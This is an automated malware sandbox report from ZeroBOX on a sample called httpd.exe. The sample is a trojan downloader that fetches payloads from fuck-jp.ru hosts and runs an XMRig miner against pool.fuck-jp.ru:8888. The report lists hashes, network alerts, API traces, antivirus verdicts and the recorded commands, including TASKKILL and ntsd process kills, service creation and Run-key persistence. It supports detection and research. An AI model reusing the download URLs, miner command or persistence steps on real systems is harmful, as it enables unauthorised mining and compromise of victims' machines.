Summary | ZeroBOX

httpd.exe

Emotet Gen1 Generic Malware Malicious Library Downloader UPX Malicious Packer Code injection Escalate priviledges Create Service KeyLogger DNS Socket PE64 AntiDebug BitCoin PE File OS Processor Check PE32 AntiVM DLL
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 5, 2021, 4:41 p.m. Sept. 5, 2021, 4:45 p.m.
Size 567.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0fa802e8a7eafd690f71460f97be0140
SHA256 df787884cb15802a125a3aab9b0e15c55952db0b8825814cc8e7ddde24249ad1
CRC32 47CD38A6
ssdeep 12288:wAc9dbM4F1Gtsra204wDOs8t1VMa7V8ceU6/IEzkNwRyZ8FuTyCtN8wtIy:BKdbM4F1GtseJTKGceU6/I/wRj9gL
PDB Path D:\svchost - 副本\Release\svchost.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)

IP Address Status Action
164.124.101.2 Active Moloch
172.67.132.245 Active Moloch
185.144.31.44 Active Moloch
45.147.228.207 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 172.67.132.245:80 -> 192.168.56.101:49213 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49218 -> 185.144.31.44:8888 2024792 ET POLICY Cryptocurrency Miner Checkin Potential Corporate Privacy Violation
TCP 192.168.56.101:49221 -> 185.144.31.44:8888 2024792 ET POLICY Cryptocurrency Miner Checkin Potential Corporate Privacy Violation
TCP 192.168.56.101:49217 -> 185.144.31.44:8888 2024792 ET POLICY Cryptocurrency Miner Checkin Potential Corporate Privacy Violation
TCP 192.168.56.101:49223 -> 185.144.31.44:8888 2024792 ET POLICY Cryptocurrency Miner Checkin Potential Corporate Privacy Violation
TCP 192.168.56.101:49222 -> 185.144.31.44:8888 2024792 ET POLICY Cryptocurrency Miner Checkin Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Huge pages support was successfully enabled, but reboot required to use it
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: ABOUT
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: XMRig/6.15.0
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: gcc/10.3.0
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: LIBS libuv/1.41.0 OpenSSL/1.1.1j hwloc/2.4.1
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: HUGE PAGES
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: unavailable
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: 1GB PAGES
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: unavailable
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: CPU Intel(R) Core(TM) i5-8400 CPU @ 2.80GHz (1)
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: 64-bit
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: AES
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: VM
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: L2:
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: 0.5 MB
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: L3:
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: 18.0 MB
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: C
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: T
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: NUMA:
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: MEMORY
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: GB
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: MOTHERBOARD
console_handle: 0x0000000000000013
1 1 0
pdb_path D:\svchost - 副本\Release\svchost.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://api.fuck-jp.ru/url64.txt
request GET http://api.fuck-jp.ru/run64.txt
request GET http://down.fuck-jp.ru/redis-server.exe
domain down.fuck-jp.ru description Russian Federation domain TLD
domain pool.fuck-jp.ru description Russian Federation domain TLD
domain api.fuck-jp.ru description Russian Federation domain TLD
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2952
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001db0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 13709033472
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Temp\redis-server.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL /F /IM cmd.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL /F /IM redis-server.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL /F /IM FileZilla_Server.exe
cmdline cmd TASKKILL /F /IM cmd.exe
cmdline "C:\Windows\System32\cmd.exe" ntsd - c q - pn redis-server.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL / F / IM httpd.exe
cmdline "C:\Windows\System32\cmd.exe" ntsd - c q - pn httpd.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL /F /IM node.exe
cmdline "C:\Windows\System32\cmd.exe" ntsd - c q - pn node.exe
cmdline "C:\Windows\System32\cmd.exe" ntsd - c q - pn FileZilla_Server.exe
file C:\Users\test22\AppData\Local\Temp\redis-server.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: TASKKILL / F / IM httpd.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: ntsd - c q - pn httpd.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: TASKKILL /F /IM FileZilla_Server.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: ntsd - c q - pn FileZilla_Server.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: TASKKILL /F /IM redis-server.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: ntsd - c q - pn redis-server.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: TASKKILL /F /IM node.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: ntsd - c q - pn node.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: TASKKILL /F /IM cmd.exe
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\httpd.exe
parameters:
filepath: C:\Windows\httpd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: redis-server.exe
parameters: -o pool.fuck-jp.ru:8888
filepath: redis-server.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 14
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd† Š/að.
request_handle: 0x00cc000c
1 1 0
url http://down.fuck-jp.ru/hh.exe
url http://api.fuck-jp.ru/run64.txt
url http://api.fuck-jp.ru/url64.txt
url https://L
url https://xmrig.com/wizard
url https://xmrig.com/benchmark/%s
url https://xmrig.com/docs/algorithms
url https://H
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Perform crypto currency mining rule BitCoin
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline cmd TASKKILL / F / IM httpd.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL /F /IM cmd.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL /F /IM redis-server.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL /F /IM FileZilla_Server.exe
cmdline cmd TASKKILL /F /IM node.exe
cmdline cmd TASKKILL /F /IM FileZilla_Server.exe
cmdline cmd TASKKILL /F /IM redis-server.exe
cmdline cmd TASKKILL /F /IM cmd.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL / F / IM httpd.exe
cmdline "C:\Windows\System32\cmd.exe" TASKKILL /F /IM node.exe
host 45.147.228.207
service_name cellinst service_path C:\Windows\httpd.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\cellinst.exe reg_value C:\Windows\httpd.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\cellinst.exe reg_value C:\Windows\httpd.exe
Time & API Arguments Status Return Repeated

CreateServiceA

service_start_name:
start_type: 2
password:
display_name: cellinst
filepath: C:\Windows\httpd.exe
service_name: cellinst
filepath_r: C:\Windows\httpd.exe
desired_access: 983551
service_handle: 0x006f5d60
error_control: 1
service_type: 272
service_manager_handle: 0x006f5e00
1 7298400 0
Process injection Process 540 resumed a thread in remote process 804
Process injection Process 804 resumed a thread in remote process 2952
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000174
suspend_count: 1
process_identifier: 804
1 0 0

NtResumeThread

thread_handle: 0x0000044c
suspend_count: 1
process_identifier: 2952
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 76 (SystemFirmwareTableInformation)
-1073741789 0
MicroWorld-eScan Gen:Heur.Mint.Zard.30
FireEye Gen:Heur.Mint.Zard.30
McAfee RDN/Generic Downloader.x
Cylance Unsafe
Alibaba TrojanDownloader:Win32/Generic.90ddc0a6
K7GW Trojan-Downloader ( 0057c0481 )
Cybereason malicious.8a7eaf
BitDefenderTheta Gen:NN.ZexaF.34126.JuW@aKdFqNci
ESET-NOD32 Win32/TrojanDownloader.Agent.FQR
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Heur.Mint.Zard.30
Avast Win32:Malware-gen
Tencent Win32.Trojan.Generic.Jmm
Ad-Aware Gen:Heur.Mint.Zard.30
Sophos Mal/Generic-S
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition RDN/Generic Downloader.x
SentinelOne Static AI - Suspicious PE
Emsisoft Gen:Heur.Mint.Zard.30 (B)
APEX Malicious
Webroot W32.Gen.BT
Avira TR/Dldr.Agent.gfejo
Microsoft Trojan:Win32/Tnega!ml
GData Gen:Heur.Mint.Zard.30
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.C4580956
VBA32 BScope.Trojan.Glupteba
MAX malware (ai score=86)
Ikarus Gen.Mint.Zard
Fortinet W32/Malicious_Behavior.VEX
AVG Win32:Malware-gen
MaxSecure Trojan.Malware.300983.susgen